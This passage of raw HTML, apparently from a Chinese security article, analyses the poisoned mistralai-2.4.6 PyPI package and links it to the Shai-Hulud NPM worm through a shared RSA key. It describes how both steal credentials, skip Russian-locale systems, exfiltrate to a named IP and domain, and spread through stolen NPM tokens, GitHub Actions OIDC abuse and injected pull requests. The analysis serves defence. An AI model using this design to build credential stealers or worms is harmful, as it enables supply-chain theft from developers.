25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">Vault Secrets</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">collectors/vault.py</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">providers/vault/vault-secrets.ts</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">文件系统扫描</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">collectors/filesystem.py</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">providers/filesystem/filesystem.ts</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">环境变量采集</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">collectors/filesystem.py _collect_env()</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">providers/devtool/devtool.ts</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">GitHub Token 提取</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">collectors/filesystem.py _collect_gh()</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">providers/ghrunner/runner.ts</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">数据加密（RSA-OAEP）</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">config.py PUBLIC_KEY_PEM</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">assets/enc_key.pub</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">俄语环境规避</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">__main__.py LANG.startsWith(&#39;ru&#39;)</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">utils/config.ts isSystemRussian()</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">主外传通道</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">POST 到 83.142.209.194</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">DomainSender → git-tanstack.com</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">GitHub 仓库兜底</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">创建公开仓库上传结果</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">GitHubSenderFactory</span></span></p></td></tr><tr><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">并发调度架构</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">aggregate.py + ThreadPoolExecutor</span></span></p></td><td><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">collector.ts + dispatcher.ts</span></span></p></td></tr></tbody></table><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">此外，两个框架的加密流程相同：采集结果 → gzip 压缩 → AES-256-GCM 随机密钥加密 → 同一 RSA 公钥 OAEP 封装对称密钥 → 发送。其中 RSA 公钥完全一致是最关键的关联证据。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">更值得注意的是，Shai-Hulud 在基础窃密功能之上还多了一层</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">主动投毒扩散能力</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，transformers.pyz 没有这部分功能：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">•</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">NPM 发布模块(</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">mutator/npm/publish.ts)：利用窃取的 NPM Token 发布恶意包</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">•</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">OIDC 滥用模块(</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">mutator/npmoidc/)：通过 GitHub Actions OIDC 凭证冒用 CI 身份发布包</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">• </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">仓库注入模块(</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">mutator/branch/)：在 GitHub 仓库中创建分支或 PR，向合法项目注入恶意代码</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">•</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">GitHub Actions Secret 窃取(</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">providers/actions/)：专门针对 CI/CD 流水线中的加密 Secret</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">为什么这把公钥是关键证据？</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">数据加密用的是&#34;公钥加密，私钥解密&#34;的非对称加密模型。公钥负责加密，私钥负责解密。攻击者把同一个公钥硬编码在两个不同的恶意框架里，意味着所有被这两个框架窃取的数据，最终都必须用</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">同一把私钥</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">来解开。这把私钥只可能由同一个攻击团伙持有。因此，共享公钥不是巧合，而是</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">同一团伙运营两个并行恶意框架的技术指纹</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从攻击体系的角度来理解，Shai-Hulud 和 transformers.pyz 很可能是这个团伙的两把&#34;刀&#34;，各有</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">分工：</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;" nodeleaf=""><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6638888888888889" data-type="png" data-w="1080" height="612" style="margin-left: 0px;margin-top: 0px;" width="922" data-imgfileid="100021310" src="https://wechat2rss.xlab.app/img-proxy/?k=dfa1f1aa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLgrxBKpmVnbJsR5wUB0u3E8iaFIBpG8CvYAfMNcwY97boId7k0g30m6yeMBoOiciaLbdDGDPNZjj9EbtUu22Ab6F5LqeXN7BktPw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">mistralai-2.4.6 正是攻击者通过 Shai-Hulud 框架入侵 Mistral AI 项目的 GitHub Actions CI/CD 流水线后，利用窃取的 OIDC 凭证通过项目的可信发布通道推送的带毒版本。这也解释了为什么该包能通过 PyPI 的正常发布校验——因为它使用的就是项目本身的受信发布凭证。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;" nodeleaf=""><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" alt="标题: fig:" class="rich_pages wxw-img" data-ratio="0.3774230330672748" data-type="png" data-w="877" height="296" style="margin-left: 0px;margin-top: 0px;" width="784" data-imgfileid="100021303" src="https://wechat2rss.xlab.app/img-proxy/?k=2469b48d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLeGmmtNRA2e5kvBXOy3LIQfwJ39QYbVqztkf6AK6bzqSfeQpLufdfTibsox1BiaL6ONcGz2TIcJKwW5lFnMQsUc4YHyCoo6pRBA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></b></b></b></b></p><p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">总结</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="line-height: 25.6px;color: rgb(234, 51, 35);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: left;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;">本次捕获的 mistralai-2.4.6 攻击事件不是孤立的——它是一起由同一攻击团伙精心构造的、横跨 PyPI 和 NPM 两大生态的复合供应链投毒活动的一个分支。其核心特点可以概括为四个&#34;巧妙&#34;和一个&#34;极端&#34;：</span></p><p dir="ltr" style="text-indent: 0px;line-height: 